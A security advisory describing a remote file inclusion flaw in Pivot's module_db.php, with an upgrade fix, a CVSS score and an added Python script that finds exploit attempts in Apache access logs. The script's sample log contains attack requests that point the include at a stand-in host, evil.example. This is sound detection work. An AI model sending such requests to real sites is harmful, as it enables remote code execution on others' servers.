Summary
Pivot is a set of PHP scripts designed to maintain dynamic web pages.
There is a flaw in the file module_db.php which may let an attacker execute arbitrary commands on the remote host by forcing the remote Pivot installation to include a PHP file hosted on an arbitrary third-party website.
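Attempts to exploit this kind of flaw leave a recognisable trace in the web server access log: a request to module_db.php whose query string carries a remote URL. The following detector is an added example, not part of this advisory or of Pivot itself; it runs over constructed Apache combined-format log lines, and the parameter name `page` is a placeholder because the advisory does not name the vulnerable parameter.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache combined log format (not real traffic).
# "page" is a placeholder: the advisory does not name the affected parameter.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2005:12:01:03 +0000] "GET /pivot/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2005:12:01:09 +0000] "GET /pivot/modules/module_db.php?page=http://evil.example/x.txt HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2005:12:02:11 +0000] "GET /pivot/modules/module_db.php?page=https%3A%2F%2Fevil.example%2Fs.txt HTTP/1.1" 200 312 "-" "curl/7.18"
192.0.2.9 - - [10/Mar/2005:12:03:40 +0000] "GET /pivot/modules/module_db.php?page=local.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
REMOTE_SCHEMES = {"http", "https", "ftp"}


def remote_include_values(target):
    """Return (param, value) pairs of a module_db.php request whose value is a remote URL."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1].lower() != "module_db.php":
        return []
    hits = []
    # parse_qsl percent-decodes values, so an encoded https%3A%2F%2F... is caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if urlsplit(value.strip()).scheme.lower() in REMOTE_SCHEMES:
            hits.append((name, value))
    return hits


def scan_log(text):
    """Scan combined-format log text; return one finding per remote-URL parameter value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in remote_include_values(m.group("target")):
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "param": name,
                             "value": value, "status": m.group("status")})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} -> {f['param']}={f['value']} (HTTP {f['status']})")
```

A 200 response to such a request does not by itself prove the include succeeded, so findings should be checked against the PHP error log and the installed Pivot version.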
Solution
Upgrade to Pivot 1.14.1 or disable this CGI altogether
Severity
Classification
-
CVSS Base Score: 7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P